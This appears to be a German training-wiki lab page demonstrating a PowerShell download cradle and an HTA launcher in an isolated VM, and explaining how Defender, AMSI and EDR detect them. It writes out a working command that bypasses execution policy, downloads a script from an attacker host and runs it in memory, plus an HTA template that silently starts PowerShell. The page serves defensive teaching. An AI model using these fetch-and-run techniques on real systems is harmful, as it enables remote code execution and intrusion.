PowerShell / HTA Payload Demonstration (Lab Only)
Zur Navigation springen
Zur Suche springen
Ziel der Übung
- Verständnis, wie einfache Downloader technisch funktionieren
- Erkennen, warum Windows Defender anschlägt
- Einordnung der Rolle von EDR-Systemen
- Demonstration ausschließlich in isolierter Test-VM ohne Internetzugang
Lab-Aufbau
- Angreifer-VM: Kali Linux
- Opfer-VM: Windows 10/11 mit aktiviertem Defender
- Netzwerk: Internes Host-Only-Netz
- Kein Zugriff ins Internet
Schritt 1 – Test-Webserver vorbereiten (Kali)
- mkdir /tmp/xinux-demo
- cd /tmp/xinux-demo
- echo "Write-Output 'Download erfolgreich – Demo Script ausgeführt'" > demo.ps1
- python3 -m http.server 8080
- Der Webserver stellt eine harmlose PowerShell-Datei bereit.
- Keine Schadfunktion – nur Ausgabe einer Meldung.
Schritt 2 – Einfacher PowerShell-Downloader (Windows VM)
- Auf der Windows-VM PowerShell als normaler Benutzer starten.
- Test-Download ausführen:
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://<KALI-IP>:8080/demo.ps1')"
- Erwartung:
- Script wird geladen und ausgeführt.
- Konsole zeigt die Testmeldung an.
Technische Erklärung
- New-Object Net.WebClient erzeugt HTTP-Client
- DownloadString lädt Script als Text
- IEX (Invoke-Expression) führt den geladenen Code direkt im Speicher aus
- Keine Datei wird zwingend auf Disk gespeichert
Warum Defender Alarm schlägt
- Heuristische Erkennung: Kombination aus Download + IEX ist verdächtig
- Signaturbasierte Mustererkennung für typische Downloader-Techniken
- AMSI (Antimalware Scan Interface) scannt Script-Inhalte vor Ausführung
- Verhaltensanalyse erkennt Netzwerk + Script-Ausführung
Demonstration Defender
- Windows-Sicherheit öffnen
- Viren- & Bedrohungsschutz → Schutzverlauf
- Erkannte Bedrohung analysieren
- Eintrag prüfen: Script oder verdächtiger Befehl
Variante mit HTA-Datei (nur Konzept)
- Eine HTA-Datei ist eine HTML-Anwendung, die über mshta.exe ausgeführt wird.
- HTA kann eingebettetes VBScript oder JScript enthalten.
- Beim Start kann sie PowerShell aufrufen.
- Beispielstruktur einer HTA-Datei:
<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -Command Write-Output 'HTA gestartet'",0
</script>
</head>
<body></body>
</html>
- Speichern als demo.hta
- Start über Doppelklick
Warum HTA problematisch ist
- mshta.exe ist signierte Windows-Komponente
- Wird häufig für sogenannte "Living off the Land"-Techniken missbraucht
- EDR erkennt Prozessketten:
mshta.exe → powershell.exe → Netzwerkzugriff
Rolle von EDR
- Klassische AV: Signatur + einfache Heuristik
- EDR: Prozessüberwachung + Telemetrie
- Erkennt:
- Eltern-Kind-Prozess-Beziehungen
- Netzwerkverbindungen
- Speicherbasierte Ausführung
- Anomales Benutzerverhalten
Didaktischer Kern
- Downloader selbst ist technisch trivial
- Gefährlich wird es durch Kombination aus:
- Social Engineering
- legitimen Systemtools
- Speicherbasierter Ausführung
- Moderne Verteidigung analysiert Verhalten, nicht nur Dateien
Abschlussdiskussion
- Warum Makros, HTA und PowerShell in Unternehmen eingeschränkt werden
- Warum Application Control (z. B. AppLocker) sinnvoll ist
- Warum Awareness-Schulung entscheidend bleibt
Wichtiger Hinweis
- Nur in isolierter VM durchführen
- Keine Tests gegen produktive Systeme
- Keine Internet-Ziele verwenden